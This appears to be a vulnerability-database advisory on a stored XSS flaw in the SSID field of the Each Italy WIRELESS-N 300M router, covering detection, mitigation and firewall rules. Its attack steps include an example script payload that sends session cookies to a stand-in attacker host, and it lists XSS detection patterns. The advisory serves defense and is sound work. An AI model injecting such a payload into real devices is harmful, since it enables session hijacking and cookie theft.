Skip to main content
CVE Vulnerability Database
Vulnerability Database/CVE-2025-65349

CVE-2025-65349: Each Italy Wireless Mini Router XSS Flaw

CVE-2025-65349 is a stored cross-site scripting vulnerability in Each Italy Wireless Mini Router WIRELESS-N 300M that enables attackers to execute malicious scripts. This article covers technical details, affected versions, and mitigation.

Published:

CVE-2025-65349 Overview

A Stored Cross-Site Scripting (XSS) vulnerability exists in the web management interface of the Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211. This vulnerability allows attackers to execute arbitrary JavaScript code by injecting a crafted payload into the repeater AP SSID field. Due to insufficient input sanitization, malicious scripts are stored and subsequently executed whenever any page is accessed at /index.htm.

Critical Impact

Attackers can persistently execute malicious scripts in the context of authenticated users accessing the router's web management interface, potentially leading to session hijacking, credential theft, or unauthorized configuration changes.

Affected Products

  • Each Italy Wireless Mini Router WIRELESS-N 300M
  • Firmware version v28K.MiniRouter.20190211
  • Web management interface at /index.htm

Discovery Timeline

  • 2026-01-15 - CVE-2025-65349 published to NVD
  • 2026-01-16 - Last updated in NVD database

Technical Details for CVE-2025-65349

Vulnerability Analysis

This Stored Cross-Site Scripting vulnerability stems from improper input validation in the router's web management interface. When a user configures the repeater AP SSID setting, the input value is stored without proper sanitization. The malicious payload persists in the device's configuration and is subsequently rendered without encoding whenever any page under /index.htm is accessed.

The attack requires low privileges (authenticated access to the router) but can affect any user who subsequently accesses the management interface, including administrators. Because the scope is changed (the vulnerability in the router affects users' browsers), the malicious script executes in the security context of the victim's browser session.

Root Cause

The root cause is a failure to implement proper input sanitization and output encoding for the repeater AP SSID parameter. The web management interface directly embeds user-supplied input into HTML pages without escaping special characters such as <, >, ", and '. This allows attackers to break out of the intended context and inject arbitrary HTML or JavaScript code that persists across sessions and affects all users viewing the affected pages.

Attack Vector

The attack is network-based, requiring the attacker to have low-privileged access to the router's web management interface. The exploitation flow involves:

  1. The attacker authenticates to the router's web management interface
  2. The attacker navigates to the repeater/wireless configuration section
  3. A malicious JavaScript payload is injected into the AP SSID field (e.g., <script>document.location='http://attacker.com/steal?c='+document.cookie</script>)
  4. The payload is stored in the router's configuration without sanitization
  5. When any user (including administrators) accesses pages at /index.htm, the malicious script executes in their browser context

The vulnerability can be exploited to steal session cookies, perform actions on behalf of authenticated administrators, modify router configurations, or redirect users to phishing pages. Technical details and proof-of-concept information are available in the GitHub Security Advisory for CVE-2025-65349.

Detection Methods for CVE-2025-65349

Indicators of Compromise

  • Unusual or suspicious strings containing <script>, javascript:, onerror=, or similar XSS patterns in the repeater AP SSID configuration
  • Unexpected outbound connections from client browsers when accessing the router management interface
  • Modified SSID values containing encoded characters or HTML entities that don't correspond to legitimate network names
  • Browser console errors or unexpected script execution warnings when accessing /index.htm

Detection Strategies

  • Monitor router configuration changes, specifically watching for SSID values containing HTML tags or JavaScript code
  • Implement web application firewall (WAF) rules to detect XSS payloads in HTTP requests to the router management interface
  • Review access logs for the router's web interface for suspicious patterns or unusual parameter values
  • Use browser-based XSS detection extensions during administrative sessions to identify stored payload execution

Monitoring Recommendations

  • Enable logging on the router's web management interface if supported
  • Monitor network traffic for unusual data exfiltration patterns originating from administrative sessions
  • Regularly audit router configurations for unexpected changes to SSID and network parameters
  • Implement network segmentation to limit access to router management interfaces from untrusted networks

How to Mitigate CVE-2025-65349

Immediate Actions Required

  • Restrict access to the router's web management interface to trusted IP addresses only
  • Change administrative credentials and invalidate any existing sessions
  • Review and clean any suspicious entries in the repeater AP SSID configuration field
  • Consider disabling the web management interface temporarily if not required for operations
  • Implement network-level access controls to prevent unauthorized access to the management interface

Patch Information

No vendor patch information is currently available for this vulnerability. Users should monitor the GitHub Security Advisory for CVE-2025-65349 for updates and contact Each Italy for firmware update information.

Workarounds

  • Disable the web management interface and manage the router via alternative methods if available
  • Implement strict network segmentation to ensure only authorized administrators can access the management interface
  • Use a reverse proxy with XSS filtering capabilities in front of the management interface
  • Manually sanitize SSID values by removing any HTML tags or special characters from the configuration
  • Consider replacing the affected device with a router from a vendor that provides regular security updates
bash
# Example: Restrict management interface access via iptables (on upstream firewall)
# Only allow management access from trusted admin subnet
iptables -A FORWARD -d <router_ip> -p tcp --dport 80 -s 192.168.1.0/24 -j ACCEPT
iptables -A FORWARD -d <router_ip> -p tcp --dport 80 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.